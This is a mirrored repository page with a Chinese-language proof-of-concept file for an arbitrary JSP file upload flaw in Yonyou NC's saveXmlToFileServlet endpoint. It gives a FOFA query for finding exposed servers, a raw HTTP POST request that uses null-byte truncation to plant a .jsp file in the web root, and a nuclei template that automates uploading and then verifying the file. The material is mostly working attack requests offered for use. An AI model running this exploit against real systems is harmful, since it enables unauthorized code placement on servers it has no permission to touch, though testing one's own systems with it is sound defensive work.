admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 05:54:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/用友OA/用友NC接口saveXmlToFIleServlet存在文件上传.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

57 lines
1.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 用友NC接口saveXmlToFIleServlet存在文件上传
/portal/pt/servlet/saveXmlToFileServlet/doPost接口会保存xml文档到服务器一个路径下默认会添加.xml后缀通过Windows的文件名特性可截断.xml文件后缀。再通过目录穿越可上传jsp文件到nc_web目录下。
## fofa
```
title:"YONYOU NC"
```
## poc
```
POST /portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename=12121.jsp%00 HTTP/1.1
Host:
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 19
111
```
文件路径:`http://ip:port/portal/processxml/12121.jsp`
## nuclei
```nuclei
id: yonyou-uap-saveXmlToFileServlet-upload-file
info:
name: yonyou-uap-saveXmlToFileServlet-upload-file
author: qianbenhyu
severity: high
http:
- method: POST
path:
- "{{BaseURL}}/portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename={{randstr_1}}.jsp%00"
headers:
Cookie: LA_K1=langid
serverEnable: localserver
Accept-Encoding: gzip, x-gzip, deflate
Content-Length: 27
Content-Type: application/octet-stream
Content-Encoding: UTF_8
Connection: keep-alive
User-Agent: Apache-HttpClient/5.2.1 (Java/1.8.0_202)
body: "{{randstr_2}}"
- method: GET
path:
- "{{BaseURL}}/portal/processxml/{{randstr_1}}.jsp"
matchers:
- type: word
words:
- "{{randstr_2}}"
```
Reference in New Issue View Git Blame Copy Permalink